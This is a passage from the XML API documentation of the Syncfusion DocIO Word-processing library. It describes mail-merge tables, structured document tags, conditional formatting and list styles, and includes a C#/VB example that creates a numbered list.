            <typeparam name="T">MailMergeDataTable</typeparam>
            <param name="tableName">Name of table</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataSet.RemoveDataTable(System.String)">
            <summary>
            Remove MailMergeDataTable with necessary table name
            </summary>
            <param name="tableName">Name of table</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMergeDataSet.DataSet">
            <summary>
            Gets list of data set objects. Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MailMergeDataTable">
            <summary>
            Represents the data tables to perform mail merge operation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MailMergeDataTable.m_groupName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MailMergeDataTable.m_sourceData">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataTable.#ctor(System.String,System.Collections.IEnumerable)">
            <summary>
            Create new instance of <see cref="T:Syncfusion.DocIO.DLS.MailMergeDataTable"/> class.
            </summary>
            <param name="groupName">A string that represents the group Name.</param>
            <param name="sourceData">A collection of source data used as data source for mail merge operation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataTable.#ctor(System.String,System.Collections.IEnumerator)">
            <summary>
            Create new instance of object
            </summary>
            <param name="groupName">Group Name</param>
            <param name="sourceData">Sourse data Dictionary</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataTable.Select(System.String)">
            <summary>
            
            </summary>
            <param name="command">Commands of formulation of new tablet</param>
            <returns>Return new instance of MailMergeDataTable from the chosen rows of current MailMergeDataTable</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMergeDataTable.GroupName">
            <summary>
            Gets a group name. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMergeDataTable.SourceData">
            <summary>
            Gets a source data. Read-only.
            </summary>
            <value>A collection of data used as data source for mail merge operation.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MailMergeException">
            <summary>
            Represents the mail merge exception.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MailMergeException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeException.#ctor(System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.MailMergeException"/> class with specified exception.
            </summary>
            <param name="innerExc">The inner exception.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeException.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.MailMergeException"/> class with specified exception message.
            </summary>
            <param name="message">A <c>String</c> that represents exception message.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeException.#ctor(System.String,System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.MailMergeException"/> class with specified exception and message.
            </summary>
            <param name="message">A <c>String</c> that represents exception message.</param>
            <param name="innerExc">The inner exception.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTBlockContent.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTBlockContent.CloneImpl">
            <summary>
            Creates a duplicate of the entity.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTBlockContent.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTBlockContent.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SDTBlockContent.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SDTBlockContent.ChildEntities">
            <summary>
            Gets the child entities.
            </summary>
            <value>The child entities.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTInlineContent.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTInlineContent.CloneImpl">
            <summary>
            Creates a duplicate of the entity.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTInlineContent.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTInlineContent.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SDTInlineContent.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTListContent.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SDTListContent.LastValue">
            <summary>
            Gets the last value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SDTListContent.ListItems">
            <summary>
            Gets the list items
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTProperties.CloneImpl">
            <summary>
            Creates a duplicate of the entity.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTProperties.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SDTProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTag.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTable"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.CloneImpl">
            <summary>
            Creates a duplicate of the entity.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
             <summary>
             Clones the relations.
             </summary>
             <param name="doc">The doc.</param>
            
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.GetNextTextBodyItem">
            <summary>
            Gets Next the text body item in the document.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.IsHiddenParagraphMarkIsInLastItemOfSDTContent">
            <summary>
             Determines whether is hidden paragraph mark is in last item of SDT content.
             </summary>
             <param name="SDTBlog">The SDT blog.</param>
             <param name="layoutinfo">The layoutinfo.</param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.GetFirstParagraphOfSDTContent">
            <summary>
            Gets the first paragraph of the SDTBlockContent.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.GetLastParagraphOfSDTContent">
            <summary>
            Gets the Last paragraph of the SDTBlockContent.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.CheckDeleteRev">
            <summary>
            Checks a value indicating whether this item was deleted from the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
            <value>
            	if this instance is delete revision, set to <c>true</c>.
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.SetChangedPFormat(System.Boolean)">
            <summary>
            Sets the changed Paragraph format for table.
            </summary>
            <param name="check">if it specifies the format to be changed, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.SetChangedCFormat(System.Boolean)">
            <summary>
            Sets the changed C format.
            </summary>
            <param name="check">if it specifies formatting, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.SetDeleteRev(System.Boolean)">
            <summary>
            Sets the delete rev.
            </summary>
            <param name="check">if specifies delete revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.SetInsertRev(System.Boolean)">
            <summary>
            Sets the insert rev.
            </summary>
            <param name="check">if it specifies insert revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.HasTrackedChanges">
            <summary>
            Determines whether item has tracked changes.
            </summary>
            <returns>
            	if has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression with replace string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with replace string, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive"><b>True</b> to consider the case, otherwise <c>false</c>.</param>
            <param name="wholeWord"><b>True</b> to consider the text as whole word, otherwise <c>false</c>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the regular expression with a text selection.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> which specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression with TextRangesHolder.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="textSelection">The text selection.</param>
            <param name="saveFormatting">if it specifies save source formatting, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with TextRangesHolder, taking into
            consideration caseSensitive and wholeWord options.
            </summary>
            <param name="given">The given.</param>
            <param name="textSelection">The text selection.</param>
            <param name="caseSensitive">if it specifies case sensitive, set to <c>true</c>.</param>
            <param name="wholeWord">if it specifies to check whole word, set to <c>true</c> .</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with TextRangesHolder, taking into
            consideration caseSensitive and wholeWord options.
            </summary>
            <param name="given">The given.</param>
            <param name="textSelection">The text selection.</param>
            <param name="caseSensitive">if it specifies case sensitive, set to <c>true</c> .</param>
            <param name="wholeWord">if it specifies to search a whole word, set to <c>true</c> .</param>
            <param name="saveFormatting">if it specifies save source formatting, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.ReplaceFirst(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces first entry of given string with replace string, taking into
            consideration caseSensitive and wholeWord options.
            </summary>
            <param name="given">The string to replace</param>
            <param name="replace">Replace string</param>
            <param name="caseSensitive">Is case sensitive replace?</param>
            <param name="wholeWord">Search for whole word?</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.ReplaceFirst(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression with replace string.
            </summary>
            <param name="pattern"></param>
            <param name="replace"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.RemoveCFormatChanges">
            <summary>
            Removes the character format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.RemovePFormatChanges">
            <summary>
            Removes the paragraph/table format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.AcceptCChanges">
            <summary>
            Accepts the changes for character format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.AcceptPChanges">
            <summary>
            Accepts changes in paragraph/table format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.CheckChangedCFormat">
            <summary>
            Defines whether format was changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.CheckInsertRev">
            <summary>
            Checks a value indicating whether this item was inserted to the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
            <value>
            	if this instance was inserted, set to <c>true</c>.
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns first entry of given regex.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Find(System.String,System.Boolean,System.Boolean)">
            <summary>
            Returns first entry of given string, taking into consideration caseSensitive
            and wholeWord options.
            </summary>
            <param name="given">The given.</param>
            <param name="caseSensitive">if it is case sensitive, set to <c>true</c>.</param>
            <param name="wholeWord">if it specifies to search a whole word, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.MakeChanges(System.Boolean)">
            <summary>
            Accepts or rejects changes tracked from the moment of last change acceptance.
            </summary>
            <param name="acceptChanges">if it accepts changes, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns all entries of given regex.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.CheckChangedPFormat">
            <summary>
            Defines whether paragraph format is changed.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.ChildEntities">
            <summary>
            Gets the child entities.
            </summary>
            <value>The child entities.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Syncfusion#Layouting#IWidgetContainer#Count">
            <summary>
            Gets count of child items.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.Syncfusion#Layouting#IWidgetContainer#Item(System.Int32)">
            <summary>
            Gets child item by index.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.WidgetCollection">
            <summary>
            Gets the child items
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StructureDocumentTagBlock.WidgetInnerCollection">
            <summary>
            Gets the child items
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagRow.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagCell.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTable"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.CreateLayoutInfo">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.CloneImpl">
            <summary>
            Creates a duplicate of the entity.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.ApplyBaseFormat">
            <summary>
            Applies the base format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.ApplyBaseFormatForCharacterStyle(Syncfusion.DocIO.DLS.IWCharacterStyle)">
            <summary>
            Applies the base format for character format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StructureDocumentTagInline.CopyItemsTo(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Copies the items to.
            </summary>
            <param name="paraItems">The para items.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StructureDocumentTagInline.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.StructureDocumentType">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LockSettings">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ContentRepeatingType">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ConditionalFormattingStyle">
            <summary>
            Represents a conditional style of table. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.#ctor(Syncfusion.DocIO.DLS.ConditionalFormattingCode,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the ConditionalFormattingStyle class.
            </summary>
            <param name="conditionCode">The conditionCode.</param>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.Clone">
            <summary>
            Clones the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/>, creating duplicate style.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.CloneImpl">
            <summary>
            Clones itself.
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.ParagraphFormat">
            <summary>
            Gets paragraph format.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.CellProperties">
            <summary>
            Gets cell properties.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.RowProperties">
            <summary>
            Gets row properties.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.TableProperties">
            <summary>
            Gets table properties.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.ConditionalFormattingType">
            <summary>
            Gets conditional formatting code.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ConditionalFormattingStyle.StyleType">
            <summary>
            Gets the type of the style.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/>member that specifies the type of the style.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListStyle">
            <summary>
            Represents a list style in the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Create a new list numbered list style          
                ListStyle listStyle = new ListStyle(document, ListType.Numbered);
                //Set the name for the new list style
                listStyle.Name = "UserdefinedList";
                WListLevel levelOne = listStyle.Levels[0];
                //Define the follow character, prefix, suffix, start index for level 0
                levelOne.FollowCharacter = FollowCharacterType.Tab;
                levelOne.NumberPrefix = "(";
                levelOne.NumberSufix = ")";
                levelOne.PatternType = ListPatternType.LowRoman;
                levelOne.StartAt = 1;
                levelOne.TabSpaceAfter = 5;
                levelOne.NumberAlignment = ListNumberAlignment.Center;
                document.ListStyles.Add(listStyle);
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add text to the paragraph
                paragraph.AppendText("The list of pets available:");
                //Add other paragraphs and apply the created new list style
                paragraph = section.AddParagraph();
                //Apply default numbered list style
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                paragraph.AppendText("Dog");
                paragraph = section.AddParagraph();
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                paragraph.AppendText("Cat");
                //Continue last defined list
                paragraph.ListFormat.ContinueListNumbering();
                paragraph = section.AddParagraph();
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                paragraph.AppendText("Hamsters");
                paragraph.ListFormat.ContinueListNumbering();
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                paragraph.AppendText("Turtles");
                paragraph.ListFormat.ContinueListNumbering();
                paragraph = section.AddParagraph();
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                paragraph.AppendText("Guinea Pigs");
                paragraph.ListFormat.ContinueListNumbering();
                paragraph = section.AddParagraph();
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                paragraph.AppendText("Ferrets");
                paragraph.ListFormat.ContinueListNumbering();
                paragraph = section.AddParagraph();
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                paragraph.AppendText("Fish");
                paragraph.ListFormat.ContinueListNumbering();
                
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Create a new list numbered list style          
                Dim listStyle As New ListStyle(document, ListType.Numbered)
                'Set the name for the new list style
                listStyle.Name = "UserdefinedList"
                Dim levelOne As WListLevel = listStyle.Levels(0)
                'Define the follow character, prefix, suffix, start index for level 0
                levelOne.FollowCharacter = FollowCharacterType.Tab
                levelOne.NumberPrefix = "("
                levelOne.NumberSufix = ")"
                levelOne.PatternType = ListPatternType.LowRoman
                levelOne.StartAt = 1
                levelOne.TabSpaceAfter = 5
                levelOne.NumberAlignment = ListNumberAlignment.Center
                document.ListStyles.Add(listStyle)
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add text to the paragraph
                paragraph.AppendText("The list of pets available:")
                'Add other paragraphs and apply the created new list style
                paragraph = section.AddParagraph()
                'Apply default numbered list style
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                paragraph.AppendText("Dog")
                paragraph = section.AddParagraph()
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                paragraph.AppendText("Cat")
                'Continue last defined list
                paragraph.ListFormat.ContinueListNumbering()
                paragraph = section.AddParagraph()
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                paragraph.AppendText("Hamsters")
                paragraph.ListFormat.ContinueListNumbering()
                paragraph = section.AddParagraph()
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                paragraph.AppendText("Turtles")
                paragraph.ListFormat.ContinueListNumbering()
                paragraph = section.AddParagraph()
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                paragraph.AppendText("Guinea Pigs")
                paragraph.ListFormat.ContinueListNumbering()
                paragraph = section.AddParagraph()
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                paragraph.AppendText("Ferrets")
                paragraph.ListFormat.ContinueListNumbering()
                paragraph = section.AddParagraph()
                
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                paragraph.AppendText("Fish")
                paragraph.ListFormat.ContinueListNumbering()
                
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListStyle.DEF_MULTIPLIER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListStyle.DEF_BULLLET_FIRST">
            <summary>
            List bullets type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListStyle.m_levels">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListStyle.m_listType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListStyle.m_name">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListStyle.m_baseLstStyle">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.#ctor(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.ListType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> class with the specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> 
            instance and the <see cref="T:Syncfusion.DocIO.DLS.ListType"/>.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> object.</param>
            <param name="listType">The type of the list.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.ListType,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="listType">Type of the list.</param>
            <param name="isOneLevelList">if it specifies one level list, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.CreateEmptyListStyle(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.ListType,System.Boolean)">
            <summary>
            Creates a new empty list style for the specified document, with the list type and single level option.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> object.</param>
            <param name="listType">The <see cref="T:Syncfusion.DocIO.DLS.ListType"/> for the new list style.</param>
            <param name="isOneLevelList">The <b>boolean</b> value specifying whether this list should have only one level.</param>
            <returns>The newly created <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.Clone">
            <summary>
            Creates a duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.
            </summary>
            <returns>The reference of the newly created <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.CloneImpl">
            <summary>
            Creates a duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> instance.
            <exclude/>
            </summary>
            <returns>The reference of the new <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
